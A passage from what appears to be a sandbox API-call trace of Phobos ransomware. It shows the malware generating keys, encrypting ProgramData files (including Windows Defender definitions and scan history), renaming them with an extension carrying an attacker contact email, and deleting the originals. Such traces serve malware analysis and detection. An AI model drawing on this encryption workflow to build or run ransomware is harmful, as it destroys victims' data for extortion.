pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0177.459] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.459] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0177.459] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.459] CloseHandle (hObject=0x180) returned 1 [0177.459] CloseHandle (hObject=0x188) returned 1 [0177.460] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\xps viewer.lnk")) returned 1 [0177.461] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.462] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1266) returned 1 [0177.462] CloseHandle (hObject=0x188) returned 1 [0177.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk")) returned 0x20 [0177.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.462] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.462] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.462] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.462] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.463] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.463] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.463] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f2, lpOverlapped=0x0) returned 1 [0177.469] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0177.469] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0177.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.470] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.470] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.470] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.470] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.470] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.470] CloseHandle (hObject=0x188) returned 1 [0177.470] CloseHandle (hObject=0x180) returned 1 [0177.471] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Windows Update.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\windows update.lnk")) returned 1 [0177.472] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.473] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=11628944) returned 1 [0177.473] CloseHandle (hObject=0x180) returned 1 [0177.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm")) returned 0x2020 [0177.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0177.474] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.474] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0177.474] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0177.474] ReadFile (in: hFile=0x180, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0177.478] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x3b25da, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0177.478] ReadFile (in: hFile=0x180, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0177.488] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xad7190, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0177.488] ReadFile (in: hFile=0x180, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0177.500] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0177.500] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.500] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0177.506] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.506] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0177.507] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0177.517] SetEndOfFile (hFile=0x180) returned 1 [0177.517] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xad7190, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0177.518] WriteFile (in: hFile=0x180, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0177.519] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x3b25da, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0177.519] WriteFile (in: hFile=0x180, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0177.550] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0177.550] WriteFile (in: hFile=0x180, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0177.551] CloseHandle (hObject=0x180) returned 1 [0178.135] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0178.135] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6752) returned 1 [0178.136] CloseHandle (hObject=0x184) returned 1 [0178.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}")) returned 0x2020 [0178.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.136] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0178.136] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.136] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.136] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.137] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c28) returned 1 [0178.137] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.137] ReadFile (in: hFile=0x184, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1a60, lpOverlapped=0x0) returned 1 [0178.138] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a70, dwBufLen=0x1a70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a70) returned 1 [0178.138] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a70, lpOverlapped=0x0) returned 1 [0178.139] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0178.139] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.139] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0178.139] CryptDestroyKey (hKey=0xa327e8) returned 1 [0178.139] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0178.140] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.140] CloseHandle (hObject=0x184) returned 1 [0178.140] CloseHandle (hObject=0x140) returned 1 [0178.140] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}")) returned 1 [0178.140] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.141] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.143] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10410) returned 1 [0178.143] CloseHandle (hObject=0x140) returned 1 [0178.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov")) returned 0x20 [0178.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.143] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.143] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.143] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.143] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10761) returned 1 [0178.143] CloseHandle (hObject=0x140) returned 1 [0178.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov")) returned 0x20 [0178.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.144] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.144] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15008) returned 1 [0178.144] CloseHandle (hObject=0x140) returned 1 [0178.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov")) returned 0x20 [0178.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.145] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.145] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.145] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10374) returned 1 [0178.145] CloseHandle (hObject=0x140) returned 1 [0178.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov")) returned 0x20 [0178.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.145] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.145] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.145] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.146] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=390) returned 1 [0178.146] CloseHandle (hObject=0x140) returned 1 [0178.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn")) returned 0x2022 [0178.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.146] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.147] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.147] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.229] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.229] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, 